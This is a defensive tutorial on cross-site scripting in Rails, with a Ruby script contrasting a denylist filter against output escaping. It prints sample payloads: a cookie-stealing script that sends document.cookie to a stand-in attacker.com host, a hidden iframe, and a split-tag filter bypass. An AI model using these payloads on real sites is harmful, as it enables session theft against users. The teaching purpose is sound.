Cross-site scripting (XSS): a user injects client-side executable code that the application later renders, unescaped, into a page served to other users. The malicious JavaScript can arrive through any input the application reflects or stores: form fields, URL parameters, cookies.
This
<script>alert('Hello');</script>
is the same as this
<img src=javascript:alert('Hello')>
or this
<table background="javascript:alert('Hello')">
The point is that script does not need a <script> tag: it can ride on URL-valued attributes and event handlers, so a filter that only strips <script> misses most payloads. (Current browsers no longer run javascript: URLs from img src or from the non-standard table background attribute, but the equivalent with onerror=, onload= or a javascript: href still works.)

document.cookie holds the cookies set for the page's origin, except those flagged HttpOnly; JavaScript can both read and write it.
This will send the victim's cookie to the attacker's site (the cookie value lands in the attacker's web server log as part of the requested URL):
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>
Marking the session cookie HttpOnly (the Rails default for its cookie session store) keeps it out of document.cookie, which blunts this particular payload but not XSS as a whole.

Example: present false information to the victim in order to steal the cookie, login credentials or other sensitive data. A hidden iframe pulls attacker-controlled content into the trusted page:
<iframe name="StatPage" src="http://58.xx.xxx.xxx" width=5 height=5 style="display:none"></iframe>

Filter Input and Escape Output
Allowlist the tags and attributes you want to keep, then escape everything else on output:
tags = %w(a acronym b strong i em li ul ol h1 h2 h3 h4 h5 h6 blockquote br cite sub sup ins p)
s = sanitize(user_input, tags: tags, attributes: %w(href title))
Allowing href means the sanitizer must also reject javascript: URLs inside it, which Rails' sanitize does by restricting the allowed protocols. Use the escapeHTML() method (or its alias h()) to replace the HTML-significant characters &, ", < and > with their entity forms &amp;, &quot;, &lt; and &gt; (current versions also escape ' as &#39;). The weakness of a manual escaping discipline is that it only takes one forgotten h() call to reopen the hole, so the SafeErb gem is recommended: it flags template output built from external strings that have not been escaped. Rails 3 and later escape ERB output by default; there the risk moves to explicit opt-outs such as raw and html_safe, which should be treated as code review hot spots.
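To make the "filter input vs. escape output" contrast concrete, here is an added Ruby example (not code from the notes or from Rails itself). It runs the page's payloads through a hypothetical one-pass denylist that strips only <script> tags, and through ERB::Util.html_escape, the stdlib method behind Rails' h()/escapeHTML. It goes slightly beyond the page by adding the split <scr<script>ipt> payload, which shows why a denylist of this kind cannot simply be patched with more patterns. The helper names denylist_filter, escape_output, can_open_tag? and surviving_payloads are assumptions introduced here.

```ruby
require 'erb'

# Payloads taken from the notes above, plus one (the split <scr<script>ipt>
# form) added here to show why a one-pass denylist cannot be patched up.
XSS_PAYLOADS = [
  "<script>alert('Hello');</script>",
  "<img src=javascript:alert('Hello')>",
  "<table background=\"javascript:alert('Hello')\">",
  "<script>document.write('<img src=\"http://www.attacker.com/' + document.cookie + '\">');</script>",
  "<scr<script>ipt>alert('Hello')</script>"
].freeze

# Hypothetical "filter input" attempt: strip <script> tags and nothing else.
# It is deliberately weak; it stands for the kind of denylist that gets
# written when output escaping is skipped.
def denylist_filter(input)
  input.gsub(%r{</?script[^>]*>}i, '')
end

# "Escape output": what Rails' h()/escapeHTML does. ERB::Util.html_escape
# turns & < > " ' into entities so the browser renders them as text.
def escape_output(input)
  ERB::Util.html_escape(input)
end

# In an HTML text context a string is still dangerous if it can open a tag.
def can_open_tag?(s)
  s.include?('<')
end

# Run every payload through the named filter and return the outputs that
# could still open a tag in the rendered page.
def surviving_payloads(filter, payloads = XSS_PAYLOADS)
  payloads.map { |p| send(filter, p) }.select { |out| can_open_tag?(out) }
end

if __FILE__ == $PROGRAM_NAME
  live = surviving_payloads(:denylist_filter)
  puts "denylist leaves #{live.size} payloads live:"
  live.each { |p| puts "  #{p}" }
  puts "escaping leaves #{surviving_payloads(:escape_output).size} payloads live"
  puts escape_output(XSS_PAYLOADS.first)
end
```

The denylist removes the first payload's tags but leaves the img, table and cookie-exfiltration payloads untouched, and it reassembles the split payload into a working <script> tag, since the regex only makes one pass. Escaping leaves none of them able to open a tag; the javascript: text in the img payload is still present in the output, but as inert text, which is exactly the property output escaping gives you.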